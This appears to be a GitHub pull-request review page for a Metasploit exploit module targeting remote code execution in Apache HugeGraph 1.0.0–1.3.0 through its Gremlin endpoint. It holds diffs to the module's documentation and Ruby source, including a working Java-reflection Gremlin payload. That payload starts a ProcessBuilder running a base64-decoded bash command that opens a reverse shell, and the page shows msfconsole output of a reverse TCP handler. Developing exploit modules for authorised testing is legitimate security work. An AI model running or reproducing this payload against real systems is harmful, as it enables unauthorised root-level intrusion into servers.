Responded to comments

Author: jheysel-r7

documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md

@@ -12,7 +12,7 @@ docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0
 ## Verification Steps
 
 1. Start msfconsole
-1. Do: `use exploit/multi/http/apache_hugegraph_gremlin_rce`
+1. Do: `use exploit/linux/http/apache_hugegraph_gremlin_rce`
 1. Set the `RHOST` and `LHOST` options
 1. Run the module
 1. Receive a Meterpreter session as the `root` user.
@@ -21,11 +21,11 @@ docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0
 ### Apache HugeGraph 1.0.0 docker instance
 ```
 
-msf6 exploit(multi/http/apache_hugegraph_gremlin_rce) > set rhost 127.0.0.1
+msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > set rhost 127.0.0.1
 rhost => 127.0.0.1
-msf6 exploit(multi/http/apache_hugegraph_gremlin_rce) > set lhost 172.16.199.1
+msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > set lhost 172.16.199.1
 lhost => 172.16.199.1
-msf6 exploit(multi/http/apache_hugegraph_gremlin_rce) > run
+msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > run
 
 [*] Started reverse TCP handler on 172.16.199.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)

modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb

@@ -61,18 +61,14 @@ def check
     return CheckCode::Unknown('Unable able to determine the version of Apache HugeGraph') unless version
 
     if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
-      CheckCode::Appears("Apache HugeGraph version detected: #{version}")
-    else
-      CheckCode::Safe("Apache HugeGraph version detected: #{version}")
+      return CheckCode::Appears("Apache HugeGraph version detected: #{version}")
     end
+    CheckCode::Safe("Apache HugeGraph version detected: #{version}")
   end
 
   def exploit
     print_status("#{peer} - Running exploit with payload: #{datastore['PAYLOAD']}")
 
-    cmd = "bash -c {echo,#{Rex::Text.encode_base64(payload.encoded)}}|{base64,-d}|bash"
-    commands_array = cmd.strip.split(' ')
-
     class_name = rand_text_alpha(4..12)
     thread_name = rand_text_alpha(4..12)
     command_name = rand_text_alpha(4..12)
@@ -81,9 +77,22 @@ def exploit
     constructor_name = rand_text_alpha(4..12)
     field_name = rand_text_alpha(4..12)
 
-    formatted_command = commands_array.map { |element| "\"#{element}\"" }.join(', ')
+    java_payload = <<~PAYLOAD
+      Thread #{thread_name} = Thread.currentThread();
+      Class #{class_name} = Class.forName(\"java.lang.Thread\");
+      java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");
+      #{field_name}.setAccessible(true);
+      #{field_name}.set(#{thread_name}, \"#{thread_name}\");
+      Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");
+      java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);
+      java.util.List #{command_name} = java.util.Arrays.asList(#{"bash -c {echo,#{Rex::Text.encode_base64(payload.encoded)}}|{base64,-d}|bash".strip.split(' ').map { |element| "\"#{element}\"" }.join(', ')});
+      Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});
+      java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");
+      #{start_method_name}.invoke(#{process_builder_name});
+    PAYLOAD
+
     data = {
-      'gremlin' => "Thread #{thread_name} = Thread.currentThread();Class #{class_name} = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");#{field_name}.setAccessible(true);#{field_name}.set(#{thread_name}, \"#{thread_name}\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);java.util.List #{command_name} = java.util.Arrays.asList(#{formatted_command});Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");#{start_method_name}.invoke(#{process_builder_name});",
+      'gremlin' => java_payload,
       'bindings' => {},
       'language' => 'gremlin-groovy',
       'aliases' => {}